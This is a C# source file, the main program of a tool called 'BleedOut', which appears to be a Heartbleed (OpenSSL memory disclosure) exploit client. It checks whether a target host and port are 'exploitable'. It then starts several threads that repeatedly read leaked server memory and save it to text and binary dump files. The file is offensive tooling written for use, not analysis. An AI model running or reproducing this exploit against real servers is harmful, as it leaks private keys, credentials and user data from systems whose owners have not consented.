﻿using System;
using System.Collections.Generic;
using System.Linq;
using System.Net.Sockets;
using System.Reflection;
using System.Text;
using System.Text.RegularExpressions;
using System.Threading;
using System.Threading.Tasks;

namespace BleedOut
{
    class Program
    {
        private static OpenSslMemoryReader GetReader()
        {
            return new OpenSslMemoryReader()
            {
                Host = CliArgs.Instance.Host,
                Port = CliArgs.Instance.Port
            };
        }

        private static void Dump(ChunkHandler[] handlers)
        {
            var reader = GetReader();

            while (true)
            {
                byte[] chunk = null;

                try
                {
                    chunk = reader.ReadChunk();
                }
                catch (Exception e)
                {
                    UI.DisplayErrorMessage(UIStrings.ChunkErrorFormat, Cli.FormatEscape(e.Message));
                }

                if (chunk == null)
                {
                    Thread.Sleep(500);
                    continue;
                }

                foreach (var h in handlers)
                {
                    h.ProcessChunk(chunk);
                }
            }
        }

        private static string GetFilename(string type)
        {
            return string.Format(
                "{0}_{1}_dump.{2}", 
                CliArgs.Instance.Host,
                CliArgs.Instance.Port, 
                type);
        }        

        private static bool TestServer()
        {
            UI.DisplayTestMessage(
                UIStrings.ExploitabilityTestFormat,
                CliArgs.Instance.Host,
                CliArgs.Instance.Port);

            var reader = GetReader();

            for (int i = 0; i < CliArgs.Instance.RetryCount; i++)
            {
                try
                {
                    var c = reader.ReadChunk();

                    if (c != null && c.Any())
                    {
                        UI.DisplaySuccessMessage(UIStrings.ExploitableMessage);

                        return true;
                    }
                    else
                    {
                        UI.DisplayErrorMessage(UIStrings.NoDataError);
                        Thread.Sleep(CliArgs.Instance.RetrySleep);
                    }
                }
                catch (Exception e)
                {
                    UI.DisplayErrorMessage(UIStrings.ErrorFormat, Cli.FormatEscape(e.Message));
                    Thread.Sleep(CliArgs.Instance.RetrySleep);
                }
            }

            return false;
        }

        private static void InitFiles()
        {
            if (string.IsNullOrEmpty(CliArgs.Instance.AsciiFile))
            {
                CliArgs.Instance.AsciiFile = GetFilename("txt");                
            }

            UI.DisplayFileMessage(UIStrings.Ascii, CliArgs.Instance.AsciiFile);

            if (string.IsNullOrEmpty(CliArgs.Instance.BinaryFile))
            {
                CliArgs.Instance.BinaryFile = GetFilename("bin");
            }

            UI.DisplayFileMessage(UIStrings.Binary, CliArgs.Instance.BinaryFile);
        }

        private static void ParseArguments()
        {
            var args = Environment.GetCommandLineArgs().Skip(1).ToArray();

            if (!args.Any())
            {
                UI.DisplayDirections();
                Environment.Exit(ExitCode.NoArgs);
            }

            try
            {
                new CliArgReader(args).Read<CliArgs>();
            }
            catch (ArgumentException e)
            {
                Cli.WriteLine(UIStrings.ArgumentErrorFormat, e.Message);
                Environment.Exit(ExitCode.InvalidArgs);
            }
        }

        private static void Main(string[] args)
        {
            Cli.WriteHeader(UIStrings.Header, UIStrings.HeaderStyle);

            ParseArguments();

            if (!TestServer())
            {
                UI.DisplayFatalErrorMessage(UIStrings.NotExploitableError);
                Environment.Exit(ExitCode.ServerNotExploitable);
            }

            if (CliArgs.Instance.ProbeOnly)
            {
                return;
            }

            InitFiles();

            var handlers = new ChunkHandler[]
            {
                new AsciiChunkHandler(x => UI.DisplayStringMessage(Cli.FormatEscape(x))),

                new BinaryChunkHandler(x =>
                    UI.DisplayBinaryMessage(UIStrings.BinaryDumpFormat, x.Length, CliArgs.Instance.BinaryFile)),
            };

            Parallel.ForEach(Enumerable.Range(0, CliArgs.Instance.Threads), x =>
            {
                UI.DisplayInfoMessage(UIStrings.StartingThread);
                Dump(handlers);
            });

            Thread.Sleep(-1);
        }
    }
}
